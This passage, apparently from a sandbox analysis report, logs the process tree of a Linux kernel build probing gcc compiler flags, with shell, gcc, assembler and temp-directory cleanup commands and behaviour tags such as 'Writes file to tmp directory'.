-fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2085
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2082/tmp5⤵PID:2086
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2082/tmp5⤵PID:2086
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2082/tmp5⤵PID:2086
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2082/tmp5⤵PID:2086
-
/bin/rmrm -rf /tmp/a/.tmp_20824⤵PID:2087
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Werror_date-time\";_else_echo_\"\";_fi := -Werror=date-time' >> /tmp/a/.cache.mk"3⤵PID:2088
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=incompatible-pointer-types\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2089 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20894⤵PID:2090
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" -c -x c /dev/null -o /tmp/a/.tmp_2089/tmp4⤵PID:2091
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2089/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2092
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2089/tmp5⤵PID:2093
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2089/tmp5⤵PID:2093
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2089/tmp5⤵PID:2093
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2089/tmp5⤵
- Writes file to tmp directory
PID:2093 -
/bin/rmrm -rf /tmp/a/.tmp_20894⤵PID:2094
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Werror_incompatible-pointer-types\";_else_echo_\"\";_fi := -Werror=incompatible-pointer-types' >> /tmp/a/.cache.mk"3⤵PID:2095
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Werror=designated-init\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2096 -
/bin/mkdirmkdir -p /tmp/a/.tmp_20964⤵PID:2097
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" -c -x c /dev/null -o /tmp/a/.tmp_2096/tmp4⤵PID:2098
-
/usr/lib/gcc/x86_64-linux-gnu/7/cc1/usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_FXSAVEQ=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_CRC32=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_HAVE_ASM_GOTO -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_2096/tmp -O2 -Werror -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-int-in-bool-context "-Wframe-larger-than=1024" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-falign-jumps=1" "-falign-loops=1" -funit-at-a-time -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -o -5⤵PID:2099
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_2096/tmp5⤵PID:2100
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_2096/tmp5⤵PID:2100
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_2096/tmp5⤵PID:2100
-
/usr/bin/asas --64 -o /tmp/a/.tmp_2096/tmp5⤵
- Writes file to tmp directory
PID:2100 -
/bin/rmrm -rf /tmp/a/.tmp_20964⤵PID:2101
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-Werror_designated-init\";_else_echo_\"\";_fi := -Werror=designated-init' >> /tmp/a/.cache.mk"3⤵PID:2102
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration -Werror=return-type -Wno-format-security -std=gnu89 -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -funit-at-a-time -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_FXSAVEQ=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_CRC32=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 --param=allow-store-data-races=0 -DCC_HAVE_ASM_GOTO -Wframe-larger-than=1024 -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -Werror=implicit-int -Werror=strict-prototypes -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -fmacro-prefix-map=./= -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmacro-prefix-map=./=\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2103 -
/bin/mkdirmkdir -p /tmp/a/.tmp_21034⤵PID:2104
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -Werror-implicit-function-declaration "-Werror=return-type" -Wno-format-security "-std=gnu89" -fno-PIE -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -funit-at-a-time -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_FXSAVEQ=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_CRC32=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-int-in-bool-context -O2 "--param=allow-store-data-races=0" -DCC_HAVE_ASM_GOTO "-Wframe-larger-than=1024" -fstack-protector-strong -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wno-pointer-sign -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack "-Werror=implicit-int" "-Werror=strict-prototypes" "-Werror=date-time" "-Werror=incompatible-pointer-types" "-Werror=designated-init" "-fmacro-prefix-map=./=" -c -x c /dev/null -o /tmp/a/.tmp_2103/tmp4⤵PID:2105
-
/bin/rmrm -rf /tmp/a/.tmp_21034⤵PID:2106
-
/bin/sh/bin/sh -c "echo '__cached_set_-e;_TMP_/tmp/a/.tmp___/tmp;_TMPO_/tmp/a/.tmp___/tmp.o;_mkdir_-p_/tmp/a/.tmp___;_trap_\"rm_-rf_/tmp/a/.tmp___\"_EXIT;_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Werror_return-type_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mrecord-mcount_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wno-array-bounds_-Wno-stringop-overflow_-Wno-restrict_-Wno-maybe-uninitialized_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-fmacro-prefix-map_./__-c_-x_c_/dev/null_-o_\"_TMP\"__>/dev/null_2>&1;_then_echo_\"-fmacro-prefix-map_./_\";_else_echo_\"\";_fi := ' >> /tmp/a/.cache.mk"3⤵
- Writes file to tmp directory
PID:2107 -
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( ar rcD \"\$TMP\") >/dev/null 2>&1; then echo \"D\"; else echo \"\"; fi"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:2108 -
